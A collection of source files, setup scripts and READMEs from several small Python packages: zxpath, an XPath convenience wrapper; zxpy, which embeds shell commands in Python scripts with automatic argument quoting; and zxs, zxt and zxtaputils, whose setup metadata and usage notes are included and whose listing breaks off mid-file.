# region type checks
@staticmethod
def is_element(obj):
return isinstance(obj, etree._Element) or \
isinstance(obj, etree._ElementUnicodeResult) or \
isinstance(obj, etree._Comment)
@staticmethod
def is_node_element(obj):
# check whether the object is an element node
return isinstance(obj, etree._Element)
@staticmethod
def is_text_element(obj):
# check whether the object is a text node
return isinstance(obj, etree._ElementUnicodeResult)
@staticmethod
def is_comment(obj):
return isinstance(obj, etree._Comment)
# endregion
# region conversion and extraction
@staticmethod
def to_etree(text):
return etree.HTML(text)
@staticmethod
def to_string(node, default=None, del_none=True):
if isinstance(node, list):
result = []
for s in node:
s = _base_library.to_string(s, default)
if s or not del_none:
result.append(s)
return result
else:
return node.xpath('string(.)')
@staticmethod
def get_text(node, default=None, del_none=True):
if isinstance(node, list):
result = []
for s in node:
s = _base_library.get_text(s, default)
if s or not del_none:
result.append(s)
return result
else:
return _base_library.get_once(node.xpath('./text()'), default)
@staticmethod
def get_attr(node, attr, default=None):
return _base_library.get_once(node.xpath('./@' + attr), default)
@staticmethod
def get_html(node, encoding=None):
bhtml = etree.tostring(node, encoding=encoding)
if encoding:
return bhtml.decode(encoding)
return bhtml.decode()
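# A small illustration of the difference between to_string and get_text,
# using a made-up fragment node = etree.HTML('<div>a<b>c</b></div>').xpath('//div')[0]:
#   _base_library.to_string(node) -> 'ac'  (text of the node and all descendants)
#   _base_library.get_text(node)  -> 'a'   (only the node's direct text)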
# endregion
# region advanced queries
@staticmethod
def _parser_attr(**attrs):
if len(attrs) == 0:
return ''
fmt = '[{}]'
attr_fmt_all = '@{}'
attr_fmt = '@{}="{}"'
not_fmt = 'not({})'
text_fmt = 'text()="{}"'
search_attrs = []  # attributes to match
not_attrs = []  # attributes to exclude
for key, value in attrs.items():
if value is None:  # skip invalid attribute values
continue
# check whether this is an exclusion attribute
_not = False
if value is False:
_not = True
# strip the leading underscore and mark the attribute as excluded
if key[0] == '_':
_not = True
key = key[1:]
# strip the trailing underscore from class_
if key == 'class_':
key = 'class'
# convert key:value into an xpath predicate
if value is True or value is False:
attr_text = 'text()' if key == 'text' else attr_fmt_all.format(key)
else:
attr_text = text_fmt.format(value) if key == 'text' else attr_fmt.format(key, value)
search_attrs.append(attr_text) if not _not else not_attrs.append(attr_text)
# build the exclusion predicate
if not_attrs:
not_attrs = ' or '.join(not_attrs)
not_attrs = not_fmt.format(not_attrs)
search_attrs.append(not_attrs)
# join the predicates
search_attrs = ' and '.join(search_attrs)
if search_attrs:
return fmt.format(search_attrs)
return ''
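# A few examples of how keyword attributes map to xpath predicates
# (illustrative only; find()/_find() below prepend the element name and axis):
#   _parser_attr(class_='content')            -> '[@class="content"]'
#   _parser_attr(id=True)                     -> '[@id]'
#   _parser_attr(class_='content', _id=True)  -> '[@class="content" and not(@id)]'
#   _parser_attr(text='hello')                -> '[text()="hello"]'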
@staticmethod
def find(node, name=None, class_=None, text=None, deep=True, **attrs):
'''
Find a single node.
:param node: the source node
:param name: element name; if it is not a str, all element names are matched
:param class_: the class attribute
:param text: the text value
:param deep: also search descendant (grandchild) nodes
:param attrs: prefixing an attribute name with an underscore excludes it, e.g. _id=True becomes not(@id) in xpath;
an attribute value of True matches any value of that attribute
:return: an etree._Element node on success, None on failure
'''
result = _base_library._find(node, once=True, name=name, class_=class_, text=text, deep=deep, **attrs)
return _base_library.get_once(result)
@staticmethod
def find_all(node, name=None, class_=None, text=None, deep=True, **attrs):
'''Find multiple nodes. Same usage as find; returns a list, or an empty list when nothing matches.'''
return _base_library._find(node, once=False, name=name, class_=class_, text=text, deep=deep, **attrs)
@staticmethod
def _find(node, once=False, name=None, class_=None, text=None, deep=True, **attrs):
fmt = '{deep}{name}{attr_text}'
deep = './/' if deep else './'
name = name if isinstance(name, str) else '*'
attr_text = _base_library._parser_attr(class_=class_, text=text, **attrs)
code = fmt.format(deep=deep, name=name, attr_text=attr_text)
if once:
code = '{}[1]'.format(code)
return node.xpath(code)
# endregion
# region node tree
@staticmethod
def find_pre(node):
# return all preceding sibling element nodes of the current node
return node.xpath('preceding-sibling::*')
@staticmethod
def find_pre_text(node):
# return all preceding sibling text nodes of the current node
return node.xpath('preceding-sibling::text()')
@staticmethod
def find_pre_all(node):
# return all preceding sibling nodes of the current node
return node.xpath('preceding-sibling::node()')
@staticmethod
def find_pre_one(node):
return _base_library.get_once(node.xpath('preceding-sibling::node()[1]'))
@staticmethod
def find_next(node):
# return all following sibling element nodes of the current node
return node.xpath('following-sibling::*')
@staticmethod
def find_next_text(node):
# return all following sibling text nodes of the current node
return node.xpath('following-sibling::text()')
@staticmethod
def find_next_all(node):
# return all following sibling nodes of the current node
return node.xpath('following-sibling::node()')
@staticmethod
def find_next_one(node):
return _base_library.get_once(node.xpath('following-sibling::node()[1]'))
@staticmethod
def find_child(node):
# return all child element nodes of the current node
return node.xpath('child::*')
@staticmethod
def find_child_text(node):
# return all child text nodes of the current node
return node.xpath('child::text()')
@staticmethod
def find_child_all(node):
# return all child nodes of the current node
return node.xpath('child::node()')
@staticmethod
def find_parent(node):
return _base_library.get_once(node.xpath('parent::*'))
@staticmethod
def find_ancestor(node):
return node.xpath('ancestor::*')
# endregion
class _Element_List(list):
@property
def empty(self):
return len(self) == 0
def is_empty(self):
return len(self) == 0
@property
def string(self):
return self.get_string()
@property
def text(self):
return self.get_text()
@property
def string_list(self):
return self.get_string()
@property
def text_list(self):
return self.get_text()
def get_string(self, join_str='\t', strip=True):
return join_str.join(self.get_string_list(strip))
def get_text(self, join_str='\t', strip=True):
return join_str.join(self.get_text_list(strip))
def get_string_list(self, strip=True):
if not strip:
return [node.string for node in self if node.string]
values = []
for node in self:
text = node.string.strip()
if text:
values.append(text)
return values
def get_text_list(self, strip=True):
if not strip:
return [node.text for node in self if node.text]
values = []
for node in self:
text = node.text.strip()
if text:
values.append(text)
return values
class _Element():
def __init__(self, src):
self.name = 'comment' if _base_library.is_comment(src) else src.tag.lower()
self.base = src
self._string = None
self._text = None
self._attrs = None
# region raw xpath queries
def xpath_once(self, code):
result = _base_library.xpath_once(self.base, code=code)
return self._build_Element(result)
def xpath_all(self, code):
result = _base_library.xpath_all(self.base, code=code)
return self._build_Element(result)
# endregion
# region find functions
def find(self, name=None, class_=None, text=None, deep=True, **attrs):
result = _base_library.find(self.base, name=name, class_=class_, text=text, deep=deep,
**attrs)
return self._build_Element(result)
def find_all(self, name=None, class_=None, text=None, deep=True, **attrs):
result = _base_library.find_all(self.base, name=name, class_=class_, text=text, deep=deep,
**attrs)
return self._build_Element(result)
# endregion
# region type checks
@property
def is_element(self):
return True
@property
def is_node_element(self):
return True
@property
def is_text_element(self):
return False
@property
def is_comment(self):
return _base_library.is_comment(self.base)
# endregion
# region conversion and extraction functions
@property
def string(self):
# return the combined text of this node and all of its descendants
return self.get_string()
@property
def text(self):
# return the direct text of this node
return self.get_text()
@property
def html(self):
return self.get_html()
def get_string(self):
if self._string is None:
result = _base_library.to_string(self.base)
self._string = self._build_Element(result)
return self._string
def get_text(self):
if self._text is None:
result = _base_library.get_text(self.base, '')
self._text = self._build_Element(result)
return self._text
def get_html(self, encoding='utf8'):
return _base_library.get_html(self.base, encoding)
def get_attr(self, attr, default=None):
# result = simple_xpath.get_attr(self.base, attr, default)
# return self._build_Element(result)
return self.attrs.get(attr, default)
@property
def attrs(self):
if self._attrs is None:
self._attrs = dict(self.base.attrib)
return self._attrs
# endregion
def remove_self(self):
_base_library.find_parent(self.base).remove(self.base)
self._string = None
self._text = None
def remove(self, element):
assert isinstance(element, _Element), 'only a sharp_xpath._Element object can be removed'
self.base.remove(element.base)
self._string = None
self._text = None
# region node tree
@property
def previous_siblings(self):
result = _base_library.find_pre(self.base)
return self._build_Element(result)
@property
def previous_siblings_all(self):
result = _base_library.find_pre_all(self.base)
return self._build_Element(result)
@property
def previous_siblings_text(self):
result = _base_library.find_pre_text(self.base)
return self._build_Element(result)
@property
def previous_siblings_one(self):
result = _base_library.find_pre_one(self.base)
return self._build_Element(result)
@property
def next_siblings(self):
result = _base_library.find_next(self.base)
return self._build_Element(result)
@property
def next_siblings_all(self):
result = _base_library.find_next_all(self.base)
return self._build_Element(result)
@property
def next_siblings_text(self):
result = _base_library.find_next_text(self.base)
return self._build_Element(result)
@property
def next_siblings_one(self):
result = _base_library.find_next_one(self.base)
return self._build_Element(result)
@property
def childs(self):
result = _base_library.find_child(self.base)
return self._build_Element(result)
@property
def childs_all(self):
result = _base_library.find_child_all(self.base)
return self._build_Element(result)
@property
def childs_text(self):
result = _base_library.find_child_text(self.base)
return self._build_Element(result)
@property
def parent(self):
result = _base_library.find_parent(self.base)
return self._build_Element(result)
@property
def ancestor(self):
result = _base_library.find_ancestor(self.base)
return self._build_Element(result)
# endregion
def __call__(self, *args, **kwargs):
return self.find_all(*args, **kwargs)
def _build_Element(self, node):
if isinstance(node, list):
return _Element_List([self._build_Element(n) for n in node])
if node is not None:
if isinstance(node, str):
return _TextElement(node)
return _Element(node)
def __getattr__(self, name):
# let obj.xxx fetch an attribute or, failing that, search for a matching child node
if name not in self.__dict__:
result = self.get_attr(name, default=None)
if result is None:
result = self.find(name, deep=True)
self.__dict__[name] = result
return self.__dict__[name]
def __getitem__(self, name):
# let obj['xxx'] fetch an attribute
return self.attrs[name]
class _TextElement(str):
def __init__(self, value=''):
self.base = value
self.name = 'text'
super().__init__()
@property
def string(self):
return self
@property
def text(self):
return self
@property
def is_element(self):
return _base_library.is_element(self.base)
@property
def is_node_element(self):
return False
@property
def is_text_element(self):
return _base_library.is_text_element(self.base)
@property
def is_comment(self):
return False
def get_string(self):
return self
def get_text(self):
return self
def __getattr__(self, name):
return None
def __deepcopy__(self, memodict=None):
return self
class Element(_Element):
def __init__(self, src):
if not _base_library.is_element(src):
assert isinstance(src, str) and src, 'only an etree object or an html string can be passed in, got {}'.format(type(src))
src = _base_library.to_etree(src)
super().__init__(src)
def load(src):
return Element(src)
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/zxpath.py
|
zxpath.py
|
# A more convenient xpath
### Usage is similar to Beautiful Soup 4, but faster
```
import zxpath
zx = zxpath.load('an etree object or html source')  # load
find()  # find a single node; returns None on failure
zx.find('div', class_='content')  # equivalent to .//div[@class="content"][1]
zx.find('div', class_=False)  # equivalent to .//div[not(@class)][1]
zx.find('div', _class_='content')  # equivalent to .//div[not(@class="content")][1]
zx.find('div', class_=True, deep=False)  # equivalent to ./div[@class][1]; deep controls whether descendant (grandchild) nodes are searched
find_all()  # find multiple nodes; same parameters as find, returns a list, or an empty list on failure
zx(*attr, **kw)  # same as find_all
```
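A short end-to-end sketch of the calls above (the HTML snippet is a made-up example):
```
import zxpath

html = '<div class="content" id="main">hello <a href="/x">link</a></div>'
zx = zxpath.load(html)

node = zx.find('div', class_='content')  # .//div[@class="content"][1]
print(node['id'])    # -> 'main'
print(node.text)     # -> 'hello '
print(node.string)   # -> 'hello link'
print(node.a.text)   # -> 'link'
```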
> # _Element object
> node = zx.find('div')
>
> node.id  # get the id attribute
> node.text  # get the node's text
> node.string  # get all text inside the div
> node.a  # get the first a element node found under this node
> node.html  # get this node's html source
> node.find
> node.find_all
> node(*attr, **kw)  # same as find_all
> node.xpath_once  # query a single node with a raw xpath expression
> node.xpath_all  # query multiple nodes with a raw xpath expression
Changelog:
> 1.0.3
> Removing a node now resets the cached string and text data
> The find parameter sun_node was renamed to deep
> 1.0.2
> Added:
> _Element_List: every multi-result query on an Element object now returns an _Element_List
> 1.0.1
> Fixed bugs that caused:
> sibling text nodes to be skipped when looking up the previous sibling node
> sibling text nodes to be skipped when looking up the next sibling node
- - -
This project is provided for learning and exchange purposes only; commercial use is prohibited.
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/README.md
|
README.md
|
#!/usr/bin/env python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name='zxpath',
version='1.0.3',
py_modules=['zxpath'],
author='zlyuan',
author_email='1277260932@qq.com',
packages=find_packages(),
description='A more convenient xpath; usage is similar to Beautiful Soup 4, but faster',
# long_description=open('README.md','r',encoding='utf8').read(), # project description
url='https://pypi.org/',
license='GNU GENERAL PUBLIC LICENSE',
platforms=['all'],
scripts=[], # extra scripts
install_requires=['lxml'], # dependencies
classifiers=[
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
]
)
|
zxpath
|
/zxpath-1.0.3.tar.gz/zxpath-1.0.3/setup.py
|
setup.py
|
"""
zxpy: Shell scripts made simple
To run script(s):
zxpy script.py
To start a REPL:
zxpy
If you haven't installed zxpy globally, you can run it by doing:
path/to/python -m zx [...]
zxpy files can also be executed directly on a POSIX system by adding
the shebang:
#! /usr/bin/env zxpy
...to the top of your file, and executing it directly like a shell
script. Note that this requires you to have zxpy installed globally.
"""
from __future__ import annotations
import argparse
import ast
import code
import codecs
import contextlib
import inspect
import pipes
import re
import shlex
import subprocess
import sys
import traceback
from typing import Any, Generator, IO, Optional
UTF8Decoder = codecs.getincrementaldecoder("utf8")
class ZxpyArgs(argparse.Namespace):
interactive: Optional[bool]
filename: str
def cli() -> None:
"""
Simple CLI interface.
To run script(s):
zxpy script.py
To start a REPL:
zxpy
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-i',
'--interactive',
action='store_true',
help='Run in interactive mode',
)
parser.add_argument('filename', help='Name of file to run', nargs='?')
# Everything passed after a `--` is arguments to be used by the script itself.
script_args = ['/bin/sh']
try:
separator_index = sys.argv.index('--')
script_args.extend(sys.argv[separator_index + 1 :])
# Remove everything after `--` so that argparse passes
sys.argv = sys.argv[:separator_index]
except ValueError:
# `--` not present in command, so no extra script args
pass
args = parser.parse_args(namespace=ZxpyArgs())
# Once arg parsing is done, replace argv with script args
sys.argv = script_args
if args.filename is None:
setup_zxpy_repl()
return
with open(args.filename) as file:
module = ast.parse(file.read())
globals_dict: dict[str, Any] = {}
try:
run_zxpy(args.filename, module, globals_dict)
except Exception:
# Only catch the exception in interactive mode
if not args.interactive:
raise
traceback.print_exc()
if args.interactive:
globals().update(globals_dict)
install()
def is_inside_single_quotes(string: str, index: int) -> bool:
"""Returns True if the given index is inside single quotes in a shell command."""
quote_index = string.find("'")
if quote_index == -1:
# No single quotes
return False
if index < quote_index:
# We're before the start of the single quotes
return False
double_quote_index = string.find('"')
if double_quote_index >= 0 and double_quote_index < quote_index:
next_double_quote = string.find('"', double_quote_index + 1)
if next_double_quote == -1:
# Double quote opened but never closed
return False
# Single quotes didn't start and we passed the index
if next_double_quote >= index:
return False
# Ignore all single quotes inside double quotes.
index -= next_double_quote + 1
rest = string[next_double_quote + 1 :]
return is_inside_single_quotes(rest, index)
next_quote = string.find("'", quote_index + 1)
if next_quote >= index:
# We're inside single quotes
return True
index -= next_quote + 1
rest = string[next_quote + 1 :]
return is_inside_single_quotes(rest, index)
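# A couple of illustrative cases (the commands are hypothetical):
#   is_inside_single_quotes("echo '$1'", 6)  -> True   ($1 is protected by single quotes)
#   is_inside_single_quotes('echo "$1"', 6)  -> False  (double quotes do not suppress substitution)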
@contextlib.contextmanager
def create_shell_process(command: str) -> Generator[IO[bytes], None, None]:
"""Creates a shell process, yielding its stdout to read data from."""
# shell argument support, i.e. $0, $1 etc.
dollar_indices = [index for index, char in enumerate(command) if char == '$']
for dollar_index in reversed(dollar_indices):
if (
dollar_index >= 0
and dollar_index + 1 < len(command)
and command[dollar_index + 1].isdigit()
and not is_inside_single_quotes(command, dollar_index)
):
end_index = dollar_index + 1
while end_index + 1 < len(command) and command[end_index + 1].isdigit():
end_index += 1
number = int(command[dollar_index + 1 : end_index + 1])
# Get argument number from sys.argv
if number < len(sys.argv):
replacement = sys.argv[number]
else:
replacement = ""
command = command[:dollar_index] + replacement + command[end_index + 1 :]
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
)
assert process.stdout is not None
yield process.stdout
process.wait()
process.stdout.close()
if process.returncode != 0:
raise ChildProcessError(process.returncode)
def run_shell(command: str) -> str:
"""This is indirectly run when doing ~'...'"""
with create_shell_process(command) as stdout:
output = stdout.read().decode()
return output
def run_shell_print(command: str) -> None:
"""Version of `run_shell` that prints out the response instead of returning a string."""
with create_shell_process(command) as stdout:
decoder = UTF8Decoder()
with open(stdout.fileno(), 'rb', closefd=False) as buff:
for text in iter(buff.read1, b""):
print(decoder.decode(text), end="")
print(decoder.decode(b"", final=True), end="")
def run_shell_alternate(command: str) -> tuple[str, str, int]:
"""Like run_shell but returns 3 values: stdout, stderr and return code"""
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
stdout_text, stderr_text = process.communicate()
assert process.stdout is not None
assert process.stderr is not None
assert process.returncode is not None
return (
stdout_text.decode(),
stderr_text.decode(),
process.returncode,
)
def run_zxpy(
filename: str,
module: ast.Module,
globals_dict: dict[str, Any] | None = None,
) -> None:
"""Runs zxpy on a given file"""
patch_shell_commands(module)
code = compile(module, filename, mode="exec")
if globals_dict is None:
globals_dict = {}
globals_dict.update(
{
"__name__": "__main__",
"$run_shell": run_shell,
"$run_shell_alternate": run_shell_alternate,
"$run_shell_print": run_shell_print,
"$shlex_quote": shlex.quote,
}
)
exec(code, globals_dict)
def patch_shell_commands(module: ast.Module | ast.Interactive) -> None:
"""Patches the ast module to add zxpy functionality"""
shell_runner = ShellRunner()
shell_runner.visit(module)
ast.fix_missing_locations(module)
def quote_fstring_args(fstring: ast.JoinedStr) -> None:
for index, node in enumerate(fstring.values):
if isinstance(node, ast.FormattedValue):
# If it's marked as a raw shell string, then don't escape
if (
isinstance(node.format_spec, ast.JoinedStr)
and len(node.format_spec.values) == 1
and (
isinstance(node.format_spec.values[0], ast.Str)
and node.format_spec.values[0].s == "raw"
or isinstance(node.format_spec.values[0], ast.Constant)
and node.format_spec.values[0].value == "raw"
)
):
node.format_spec = None
continue
fstring.values[index] = ast.Call(
func=ast.Name(id="$shlex_quote", ctx=ast.Load()),
args=[node],
keywords=[],
)
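# Roughly, quote_fstring_args wraps each interpolated value in a shlex.quote()
# call unless it carries the :raw format spec. A sketch of the transformation
# (filename is a hypothetical variable; names starting with $ are internal):
#   ~f'cat {filename}'      ->  $run_shell_print(f'cat {$shlex_quote(filename)}')
#   ~f'cat {filename:raw}'  ->  $run_shell_print(f'cat {filename}')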
class ShellRunner(ast.NodeTransformer):
"""Replaces the ~'...' syntax with run_shell(...)"""
@staticmethod
def modify_expr(
expr: ast.expr,
return_stderr_and_returncode: bool = False,
print_it: bool = False,
) -> ast.expr:
if (
isinstance(expr, ast.UnaryOp)
and isinstance(expr.op, ast.Invert)
and isinstance(expr.operand, (ast.Str, ast.JoinedStr))
):
if isinstance(expr.operand, ast.JoinedStr):
quote_fstring_args(expr.operand)
function_name = (
"$run_shell_alternate"
if return_stderr_and_returncode
else "$run_shell_print"
if print_it
else "$run_shell"
)
return ast.Call(
func=ast.Name(id=function_name, ctx=ast.Load()),
args=[expr.operand],
keywords=[],
)
return expr
def visit_Expr(self, expr: ast.Expr) -> ast.Expr:
expr.value = self.modify_expr(expr.value, print_it=True)
super().generic_visit(expr)
return expr
def visit_Assign(self, assign: ast.Assign) -> ast.Assign:
# If there's more than one target on the left, assume 3-tuple
multiple_targets = isinstance(assign.targets[0], (ast.List, ast.Tuple))
assign.value = self.modify_expr(
assign.value,
return_stderr_and_returncode=multiple_targets,
)
super().generic_visit(assign)
return assign
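# For example (illustrative):
#   out = ~'ls'             ->  out = $run_shell('ls')
#   out, err, code = ~'ls'  ->  out, err, code = $run_shell_alternate('ls')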
def visit_Call(self, call: ast.Call) -> ast.Call:
for index, arg in enumerate(call.args):
call.args[index] = self.modify_expr(arg)
super().generic_visit(call)
return call
def visit_Attribute(self, attr: ast.Attribute) -> ast.Attribute:
attr.value = self.modify_expr(attr.value)
super().generic_visit(attr)
return attr
def setup_zxpy_repl() -> None:
"""Sets up a zxpy interactive session"""
print("zxpy shell")
print("Python", sys.version)
print()
install()
sys.exit()
class ZxpyConsole(code.InteractiveConsole):
"""Runs zxpy over"""
def runsource(
self,
source: str,
filename: str = "<console>",
symbol: str = "single",
) -> bool:
# First, check if it could be incomplete input, return True if it is.
# This will allow it to keep taking input
with contextlib.suppress(SyntaxError, OverflowError):
if code.compile_command(source) is None:
return True
try:
ast_obj = ast.parse(source, filename, mode=symbol)
assert isinstance(ast_obj, ast.Interactive)
patch_shell_commands(ast_obj)
code_obj = compile(ast_obj, filename, mode=symbol)
except (ValueError, SyntaxError):
# Let the original implementation take care of incomplete input / errors
return super().runsource(source, filename, symbol)
self.runcode(code_obj)
return False
def install() -> None:
"""
Starts an interactive Python shell with zxpy features.
Useful for setting up a zxpy session in an already running REPL.
Simply do:
>>> import zx; zx.install()
and zxpy should be enabled in the REPL.
"""
# Get locals from parent frame
frames = inspect.getouterframes(inspect.currentframe())
if len(frames) > 1:
parent_frame = frames[1]
parent_locals = parent_frame.frame.f_locals
else:
parent_locals = {}
# For tab completion and arrow key support
if sys.platform != "win32":
import readline
readline.parse_and_bind("tab: complete")
zxpy_locals = {
**parent_locals,
"$run_shell": run_shell,
"$run_shell_alternate": run_shell_alternate,
"$run_shell_print": run_shell_print,
"$shlex_quote": shlex.quote,
}
ZxpyConsole(locals=zxpy_locals).interact(banner="", exitmsg="")
if __name__ == "__main__":
cli()
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/zx.py
|
zx.py
|
# zxpy
[Downloads](https://pepy.tech/project/zxpy)
[Code style: black](https://github.com/psf/black)
[CI](https://github.com/tusharsadhwani/zxpy/actions/workflows/tox.yml)
Shell scripts made simple 🐚
zxpy lets you seamlessly write shell commands inside Python code, to create readable and maintainable shell scripts.
Inspired by Google's [zx](https://github.com/google/zx), but made much simpler and more accessible using Python.
## Rationale
Bash is cool, and it's extremely powerful when paired with linux coreutils and pipes. But apart from that, it's a whole other language to learn, and has a (comparatively) unintuitive syntax for things like conditionals and loops.
`zxpy` aims to supercharge bash by allowing you to write scripts in Python, but with native support for bash commands and pipes.
Let's use it to find all `TODO`s in one of my other projects, and format them into a table:
```python
#! /usr/bin/env zxpy
todo_comments = ~"git grep -n TODO"
for todo in todo_comments.splitlines():
filename, lineno, code = todo.split(':', 2)
*_, comment = code.partition('TODO')
print(f"{filename:40} on line {lineno:4}: {comment.lstrip(': ')}")
```
Running this, we get:
```console
$ ./todo_check.py
README.md on line 154 : move this content somewhere more sensible.
instachat/lib/models/message.dart on line 7 : rename to uuid
instachat/lib/models/update.dart on line 13 : make int
instachat/lib/services/chat_service.dart on line 211 : error handling
server/api/api.go on line 94 : move these to /chat/@:address
server/api/user.go on line 80 : check for errors instead of relying on zero value
```
Writing something like this purely in bash or in Python would be much harder than this. Being able to use linux utilities seamlessly with a readable, general purpose language is what makes this a really powerful tool.
### A larger, practical example
You can find a comparison between a practical-ish script written in bash and
zxpy in [EXAMPLE.md](./EXAMPLE.md)
## Installation <a href="https://pypi.org/project/zxpy"><img src="https://img.shields.io/badge/pypi-zxpy-blue?style=flat"></a>
```console
pip install zxpy
```
### pipx
If you have `pipx` installed, you can try out zxpy without installing it, by running:
```console
pipx run zxpy
```
## Basic Examples
Make a file `script.py` (The name and extension can be anything):
```python
#! /usr/bin/env zxpy
~'echo Hello world!'
file_count = ~'ls -1 | wc -l'
print("file count is:", file_count)
```
And then run it:
```console
$ chmod +x ./script.py
$ ./script.py
Hello world!
file count is: 3
```
> Run `>>> help('zx')` in Python REPL to find out more ways to use zxpy.
A slightly more involved example: [run_all_tests.py](./examples/run_all_tests.py)
```python
#! /usr/bin/env zxpy
test_files = (~"find -name '*_test\.py'").splitlines()
for filename in test_files:
try:
print(f'Running {filename:.<50}', end='')
output = ~f'python {filename}' # variables in your shell commands :D
assert output == ''
print('Test passed!')
except:
print(f'Test failed.')
```
Output:
```bash
$ ./run_all_tests.py
Running ./tests/python_version_test.py....................Test failed.
Running ./tests/platform_test.py..........................Test passed!
Running ./tests/imports_test.py...........................Test passed!
```
More examples are in [EXAMPLE.md](./EXAMPLE.md), and in the [examples folder](./examples).
## `stderr` and return codes
To get `stderr` and return code information out of the shell command, there is an
alternative way of invoking the shell.
To use it, just unpack **3 variables** on the
left side of your `~'...'` shell string:
```python
stdout, stderr, return_code = ~'echo hi'
print(stdout) # hi
print(return_code) # 0
```
More examples are in the [examples folder](./examples).
## CLI Arguments
When writing a shell script, you often want to pass CLI arguments to it.
Like so:
```console
$ cat ./foo.sh
echo arg is: $1
$ ./foo.sh 123
arg is: 123
```
To do the same in `zxpy`, pass the script arguments after a `--` in the `zxpy` CLI command.
```python
#!/usr/bin/env zxpy
import sys
print("Argv is:", sys.argv)
~"echo output: $1 $2 $3"
```
```console
$ ./test.py
Argv is: ['/bin/sh']
output:
$ ./test.py -- abc def
Argv is: ['/bin/sh', 'abc', 'def']
output: abc def
```
Both `$1` and `sys.argv[1]` will do the same thing.
## Quoting
Take this shell command:
```console
$ uname -a
Linux pop-os 5.11.0 [...] x86_64 GNU/Linux
```
Now take this piece of code:
```pycon
>>> cmd = 'uname -a'
>>> ~f'{cmd}'
/bin/sh: 1: uname -a: not found
```
Why does this not work?
This is because `uname -a` was **quoted** into `'uname -a'`. All values passed
inside f-strings are automatically quoted to avoid [shell injection][1].
To prevent quoting, the `:raw` format_spec can be used:
```pycon
>>> cmd = 'uname -a'
>>> ~f'{cmd:raw}'
Linux pop-os 5.11.0 [...] x86_64 GNU/Linux
```
This _disables_ quoting, and the command is run exactly as provided in the string.
> Note that this shouldn't be used with external data, or this _will_ expose you
> to [shell injection][1].
## Interactive mode
```pycon
$ zxpy
zxpy shell
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0]
>>> ~"ls | grep '\.py'"
__main__.py
setup.py
zx.py
>>>
```
> Also works with `path/to/python -m zx`
It can also be used to start a zxpy session in an already running REPL.
Simply do:
```pycon
>>> import zx; zx.install()
```
and zxpy should be enabled in the existing session.
## Development/Testing
To install from source, clone the repo, and do the following:
```console
$ source ./venv/bin/activate # Always use a virtualenv!
$ pip install -r requirements-dev.txt
Processing ./zxpy
[...]
Successfully installed zxpy-1.X.X
$ pytest # runs tests
```
[1]: https://owasp.org/www-community/attacks/Command_Injection
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/README.md
|
README.md
|
# type: ignore
from setuptools import setup
setup()
|
zxpy
|
/zxpy-1.6.3.tar.gz/zxpy-1.6.3/setup.py
|
setup.py
|
This is the "zxs" package for Python 3.6+
A detailed explanation of the package, along with functions and usage examples, is contained within the Jupyter notebook.
|
zxs
|
/zxs-12.tar.gz/zxs-12/README.txt
|
README.txt
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 30 15:24:18 2018
@author: zxs107020
"""
from setuptools import setup
setup(name = 'zxs',
version = '12',
description = 'A package for data science made easy',
url = 'https://github.com/zxs107020/zxs',
author = 'zxs107020',
author_email = 'zxs107020@gmail.com',
license = 'self',
packages = ['zxs'],
entry_points = {'console_scripts': ['zxs = zxs.__main__:main']},
zip_safe = False)
|
zxs
|
/zxs-12.tar.gz/zxs-12/setup.py
|
setup.py
|
# zxtools
#### Introduction
A toolkit for zx, primarily written in Python.
#### Installation guide
1. python -m pip install .
2. python -m pip install zxt
3. python -m pip install --upgrade zxt
#### Upload guide
1. Create a .pypirc file
type NUL > %UserProfile%\.pypirc
2. The .pypirc specification (a minimal sketch of the file follows this list)
https://packaging.python.org/specifications/pypirc/
3. Upgrade the tooling
python -m pip install --upgrade build
python -m pip install --upgrade twine
4. Generating distribution archives
https://packaging.python.org/en/latest/tutorials/packaging-projects/
Switch to the directory that contains pyproject.toml; usually delete the dist directory first (RMDIR /S .\dist\ /Q)
python -m build
5. Uploading the distribution archives
https://packaging.python.org/en/latest/tutorials/packaging-projects/
python -m twine upload --repository zxt dist/*
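A minimal `.pypirc` sketch matching the `--repository zxt` name used above; the values below are placeholders, not real credentials:
```ini
[distutils]
index-servers =
    zxt

[zxt]
repository = https://upload.pypi.org/legacy/
username = __token__
password = pypi-REPLACE_WITH_YOUR_API_TOKEN
```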
#### Debugging guide
1. Uninstall the zxt package
python -m pip uninstall zxt
2. Find the directory that contains pth.py in the zxt source, and run the following command from that directory:
python ./pth.py --dflt_opt=C
3. The source is now linked into the Python environment, so you can write code that calls the zxt package for debugging.
|
zxt
|
/zxt-0.20230811.1830.tar.gz/zxt-0.20230811.1830/README.md
|
README.md
|
from setuptools import setup
setup()
|
zxt
|
/zxt-0.20230811.1830.tar.gz/zxt-0.20230811.1830/setup.py
|
setup.py
|
# zxtaputils - Utilities for handling TAP files on the ZX Spectrum (Next)
## Description
This is a collection of small utilities for working with TAP files.
This suite consists of the tools:
- bas2tap: turns BASIC code into a TAP file containing tokenized code
- tap2bas: view/save BASIC code contained in a TAP file
- tapextract: extract and save data from a TAP block
- tapify: store any files inside a TAP file as a container
- tapinfo: view information about a TAP file
- tapsplit: save a TAP file's blocks as individual files
|
zxtaputils
|
/zxtaputils-1.0.0.tar.gz/zxtaputils-1.0.0/README.md
|
README.md
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
INSTALL_REQUIRES = []
setuptools.setup(
name="zxtaputils",
version="1.0.0",
author="Wei-ju Wu",
author_email="weiju.wu@gmail.com",
description="TAP file related utilities for Sinclair ZX Spectrum",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/weiju/zxtaputils",
packages=['zxtaputils'],
install_requires = INSTALL_REQUIRES,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
